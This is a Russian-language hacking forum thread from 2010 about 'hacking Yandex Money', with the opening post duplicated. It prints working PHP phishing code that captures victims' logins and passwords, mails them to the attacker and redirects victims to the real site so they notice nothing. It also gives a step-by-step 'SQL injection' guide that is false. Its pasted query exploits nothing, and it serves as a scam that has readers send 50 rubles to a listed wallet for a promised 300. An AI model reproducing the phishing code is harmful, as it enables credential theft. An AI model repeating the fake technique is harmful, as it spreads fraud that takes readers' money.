Взлом яндекс денег - Форум
Главная | Регистрация | Вход
Новые сообщения | Участники | Поиск | RSS
  • Страница 1 из 1
  • 1
Форум » [Взлом] » Взлом сайтов » Взлом яндекс денег
Взлом яндекс денег
Сообщение«Как Все начиналось»

Два часа ночи, я был готов пойти спать, но надо было проверить почту. Зайдя к себе на мыльник (зарегистрирован я на яндекс.ру), я увидел огромное кол-во спама. Долбаный антиспам, установленный на yandex.ru, работает дерьмово, видимо спам - подарок от яндекс .ру. Что ж, как никак лето скоро, надо тоже сделать подарок любимому почтовику))
Исследовав почтовый сервис я так ничего и не нашел. Что же, поищем через гугль. Так как у яндекса есть много других сервисов помимо почтового, в строке запроса я написал: site:*yandex.ru. В ответ гугль вывалил 214 000 000 страниц урлов (к счастью половина была повторных, иначе я бы лежал в психушке ). Я налил себе кофе и начал проверять сервисы. Web-кодеры yandex.ru хорошо поработали, так как после 2-х часового аудита не было найдено ни одной уязвимости. На данный момент были учтены некоторые глюки сервиса 7ya.yandex.ru, при просмотре картинок выскакивало popup окно, запомнив адрес: Я очень удивился и обрадовался, потому что выскочило окошко, которое означало одно - target никак не фильтруется. Было решено создать фэйк страницу авторизации, чтобы был баг и робот яндекса присылал мне пароль от яндекс карты. Было уже 5 часов утра, даже после 5 кружек кофе хотелось спать (а еще больше хотелось в туалет ). Поэтому я попросил своего хорошего знакомого pixcher'a продолжить начатое мною дело. На следующий день (т.е. на этот же ) на аську пришла мессага от pixcher'a. Он создал фэйк форму, а также составил ядовитый урл:
на нашу фэйк форму'</script>
В таком виде этот урл сильно палился, поэтому мы немного замаскировали его, чтобы админы яндекса чувствовали себя сухо и комфортно . Далее был написан небольшой сниффер, который принимал переданные значения, записывал их в файл и перекидывал пороль карты на мыло , вот код сниффера:

Code
<?  
$adminmail = "mymail@yandex ru";  
function email($to,$mailtext) {  
mail($to,'password',$mailtext,$adminmail);  
}  
$text="[".date("d.m.y H:i")."]Login: $_POST[login] Password: $_POST[pass]\r\n";  
email($adminmail,$text);  
$file = fopen("logs.txt","a");  
flock($file,3);  
fputs($file, $text);  
flock($file,1);  
fclose($file);  

echo "<FORM id='auth' action='http://talk.mail.ru/login.html' method=post>  
<INPUT type=hidden name=login value='$_POST[login]'>  
<INPUT type=hidden name=pass value='$_POST[pass]'>  
<script>auth.submit();</script>  
</FORM>";  
?>

Создание фэйка - это совсем не сложно, сохраняем пагу к себе на винт и редактируем параметр action тега form. В итоге данные, которые ввел юзер, запишутся к тебе в файл и произойдет редирект, удивленный админ решит, что произошли какие-нить сбои в работе службы DNS. После этого мы создали баг к кошельку
Для проверки проделанной работы мы кинули 50 руб на этот номер кошелька 41001694522732
И на мой кошель минут через 5 пришло 300 руб. Это конечно очень мало бабла ведь столько работы было проделано. И мы с моим другом pixcher'a решили еще раз протестировать наш баг и кинуть 200 руб ну обратно нам так не чего и не пришло. Я долго думал в чем была наша промашка. И мы решили повторить операцию, еще раз кинули 50 рублей . И я не поверил своим глазам баг не исчез =) Запрос к БД на число 50 по введённым критериям совсем не фильтровался на спецсимволы!!! Абсолютно!!! Моя радость увеличилась, когда увидел что на мой кошель пришли опять 300 рублей. Как видишь, даже раскрученный проект имеет ошибки.

"Как выполнить взлом яндекс денег на своем компе"

1. Для начала проходим сюда yandex.ru

2. Заводим почтовый ящик

3. Заводим яндекс счет

4. Ложим на свой яндекс счет денег . Ну вам для этого взлома понадобится 50 рублей

5. Теперь нажимаем перевести и переводим сумму не больше не меньше а ровно 50 рублей

6 Переводим на этот счет 41001670187446 где мы сделали баг

7. Где сообщение получателю пишем вот это:

Code
SELECT COUNT(DISTINCT cc.content_id) FROM cache_content as cc, cache_content_region as r, cache_content_num as n WHERE cc.content_group = 'melody' AND cc.content_type = 'melody_mp3' AND r.content_id = cc.content_id AND n.content_id = cc.content_id AND r.region_id = '9' AND n.model_id = «0» AND singer_id = '300''

Там где написано id = «0»
Меняем значения «0» на свой номер кошелька
Вот пример :
id = «41001670187446»

8. В название платежа пишем это:

Code
cc.content_id  

9. И потом жмем перевести

10. Все дело сделано ждем минут 5 и к вам должны прийти 300 рублей. Надеюсь подробно объяснил вам. Проверено это уже на многих компах так что дерзайте.

Автор - n1ce
Дата добавления - 02.10.2010 в 03:51
n1ce Дата: Суббота, 02.10.2010, 03:51 | Сообщение # 1
«Как Все начиналось»

Два часа ночи, я был готов пойти спать, но надо было проверить почту. Зайдя к себе на мыльник (зарегистрирован я на яндекс.ру), я увидел огромное кол-во спама. Долбаный антиспам, установленный на yandex.ru, работает дерьмово, видимо спам - подарок от яндекс .ру. Что ж, как никак лето скоро, надо тоже сделать подарок любимому почтовику))
Исследовав почтовый сервис я так ничего и не нашел. Что же, поищем через гугль. Так как у яндекса есть много других сервисов помимо почтового, в строке запроса я написал: site:*yandex.ru. В ответ гугль вывалил 214 000 000 страниц урлов (к счастью половина была повторных, иначе я бы лежал в психушке ). Я налил себе кофе и начал проверять сервисы. Web-кодеры yandex.ru хорошо поработали, так как после 2-х часового аудита не было найдено ни одной уязвимости. На данный момент были учтены некоторые глюки сервиса 7ya.yandex.ru, при просмотре картинок выскакивало popup окно, запомнив адрес: Я очень удивился и обрадовался, потому что выскочило окошко, которое означало одно - target никак не фильтруется. Было решено создать фэйк страницу авторизации, чтобы был баг и робот яндекса присылал мне пароль от яндекс карты. Было уже 5 часов утра, даже после 5 кружек кофе хотелось спать (а еще больше хотелось в туалет ). Поэтому я попросил своего хорошего знакомого pixcher'a продолжить начатое мною дело. На следующий день (т.е. на этот же ) на аську пришла мессага от pixcher'a. Он создал фэйк форму, а также составил ядовитый урл:
на нашу фэйк форму'</script>
В таком виде этот урл сильно палился, поэтому мы немного замаскировали его, чтобы админы яндекса чувствовали себя сухо и комфортно . Далее был написан небольшой сниффер, который принимал переданные значения, записывал их в файл и перекидывал пороль карты на мыло , вот код сниффера:

Code
<?  
$adminmail = "mymail@yandex ru";  
function email($to,$mailtext) {  
mail($to,'password',$mailtext,$adminmail);  
}  
$text="[".date("d.m.y H:i")."]Login: $_POST[login] Password: $_POST[pass]\r\n";  
email($adminmail,$text);  
$file = fopen("logs.txt","a");  
flock($file,3);  
fputs($file, $text);  
flock($file,1);  
fclose($file);  

echo "<FORM id='auth' action='http://talk.mail.ru/login.html' method=post>  
<INPUT type=hidden name=login value='$_POST[login]'>  
<INPUT type=hidden name=pass value='$_POST[pass]'>  
<script>auth.submit();</script>  
</FORM>";  
?>

Создание фэйка - это совсем не сложно, сохраняем пагу к себе на винт и редактируем параметр action тега form. В итоге данные, которые ввел юзер, запишутся к тебе в файл и произойдет редирект, удивленный админ решит, что произошли какие-нить сбои в работе службы DNS. После этого мы создали баг к кошельку
Для проверки проделанной работы мы кинули 50 руб на этот номер кошелька 41001694522732
И на мой кошель минут через 5 пришло 300 руб. Это конечно очень мало бабла ведь столько работы было проделано. И мы с моим другом pixcher'a решили еще раз протестировать наш баг и кинуть 200 руб ну обратно нам так не чего и не пришло. Я долго думал в чем была наша промашка. И мы решили повторить операцию, еще раз кинули 50 рублей . И я не поверил своим глазам баг не исчез =) Запрос к БД на число 50 по введённым критериям совсем не фильтровался на спецсимволы!!! Абсолютно!!! Моя радость увеличилась, когда увидел что на мой кошель пришли опять 300 рублей. Как видишь, даже раскрученный проект имеет ошибки.

"Как выполнить взлом яндекс денег на своем компе"

1. Для начала проходим сюда yandex.ru

2. Заводим почтовый ящик

3. Заводим яндекс счет

4. Ложим на свой яндекс счет денег . Ну вам для этого взлома понадобится 50 рублей

5. Теперь нажимаем перевести и переводим сумму не больше не меньше а ровно 50 рублей

6 Переводим на этот счет 41001670187446 где мы сделали баг

7. Где сообщение получателю пишем вот это:

Code
SELECT COUNT(DISTINCT cc.content_id) FROM cache_content as cc, cache_content_region as r, cache_content_num as n WHERE cc.content_group = 'melody' AND cc.content_type = 'melody_mp3' AND r.content_id = cc.content_id AND n.content_id = cc.content_id AND r.region_id = '9' AND n.model_id = «0» AND singer_id = '300''

Там где написано id = «0»
Меняем значения «0» на свой номер кошелька
Вот пример :
id = «41001670187446»

8. В название платежа пишем это:

Code
cc.content_id  

9. И потом жмем перевести

10. Все дело сделано ждем минут 5 и к вам должны прийти 300 рублей. Надеюсь подробно объяснил вам. Проверено это уже на многих компах так что дерзайте.

[Table][/Table]
[Table][/Table]
Сообщение:D
Автор - SHTORm
Дата добавления - 31.10.2010 в 18:17
SHTORm Дата: Воскресенье, 31.10.2010, 18:17 | Сообщение # 2
:D
СообщениеSHTORm, spam noflyd
спс n1ce_ShoT,
Автор - DoodleZ
Дата добавления - 23.11.2010 в 10:05
DoodleZ Дата: Вторник, 23.11.2010, 10:05 | Сообщение # 3
SHTORm, spam noflyd
спс n1ce_ShoT,
Требуется люди на сайт!
СообщениеА сейчас это тоже пашет?
Автор - MEGAnik
Дата добавления - 10.02.2011 в 15:14
MEGAnik Дата: Четверг, 10.02.2011, 15:14 | Сообщение # 4
А сейчас это тоже пашет?
Сообщение[Table]Да , конечно![/Table]
Автор - n1ce
Дата добавления - 10.02.2011 в 16:58
n1ce Дата: Четверг, 10.02.2011, 16:58 | Сообщение # 5
[Table]Да , конечно![/Table]
[Table][/Table]
[Table][/Table]
Форум » [Взлом] » Взлом сайтов » Взлом яндекс денег
  • Страница 1 из 1
  • 1
Поиск:
Загрузка...


Все материалы размещенные на сайте пренадлежат их владельцам и предоставляются исключительно в ознакомительных целях.
Администрация ответственности за содержание материала не несет и убытки не возмещает.
По истечении 24 часов материал должен быть удален с вашего компьютера.
Бесплатный хостинг uCoz